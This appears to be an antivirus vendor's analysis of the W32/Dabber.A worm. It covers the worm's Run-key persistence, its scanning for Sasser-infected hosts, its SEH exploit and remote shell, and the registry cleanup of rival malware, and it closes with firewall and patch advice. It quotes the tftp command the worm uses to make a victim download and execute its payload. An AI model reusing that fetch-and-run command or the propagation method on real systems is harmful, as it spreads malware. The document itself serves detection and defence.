W32/Dabber.A!worm
Analysis
Specifics
This 32-bit virus has a packed file size of 29,696 bytes.
This virus attacks systems already infected with the
Sasser virus. The Dabber virus exploits a vulnerability
in the FTP server component of Sasser. The exploit is
based on code that overwrites a structured exception
handler (SEH) pointer. This virus also runs a TFTP server
in order to serve itself to target systems.
Load At Windows Startup
If this virus is run, it will copy itself to the Windows
folder as "package.exe". The virus will have
a related Mutex named "sas4dab" - if this
Mutex already exists, the virus assumes it has infected
the system and will not run. The virus will register
itself to load at each Windows startup -
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
sassfix = undefinedWindowsundefined\package.exe
Search For Sasser
The virus will begin scanning random IP addresses on
a destination TCP port 5554. Systems which respond are
then targets for Dabber - Dabber will send an SEH pointer
exploit to the target in order to gain access. Once
the target is compromised, Dabber initiates a remote
shell on TCP port 8967. Dabber then sends in instructions
to the target to request a copy of Dabber from the source
system using tftp in this format -
tftp -i (source
IP)
GET hello.all package.exe
package.exe
exit
The above instruction execute "package.exe"
after receiving it. Dabber also attempts to copy itself
to the target system into this hard-coded path -
c:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe
Remote Access Port
Dabber will bind with TCP port 9898 only as a listening
port. When a source system infects a target system,
it will send a connection attempt to TCP port 9898 as
a method to confirm and verify that the target is infected.
Other Virus Cleanup Routine
Dabber will remove references to other viruses by deleting
known registry keys associated with those viruses. Dabber
removes these key values -
Window
Video Process
TempCom
SkynetRevenge
MapiDrv
BagleAV
System Updater Service
soundcontrl
WinMsrv32
drvddll.exe
navapsrc.exe
skynetave.exe
Generic Host Service
Windows Drive Compatibility
windows
Microsoft Update
Drvddll.exe
Drvddll_exe
drvsys
drvsys.exe
ssgrate
ssgrate.exe
lsasss
lsasss.exe
avserve2.exe
avvserrve32
avserve
Video
Taskmon
Gremlin
from these registry hive locations -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Additionally Dabber deletes this registry key -
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
(Default)
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block external to
internal traffic using UDP port 69 and TCP ports 5554,
8967 and 9898
- For Windows XP users, implement use of Personal
Firewall - this feature automatically blocks unsolicited
inbound traffic and would protect against this Internet
worm
- Ensure affected systems are updated with the latest
Microsoft security patches, and specifically the update
which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |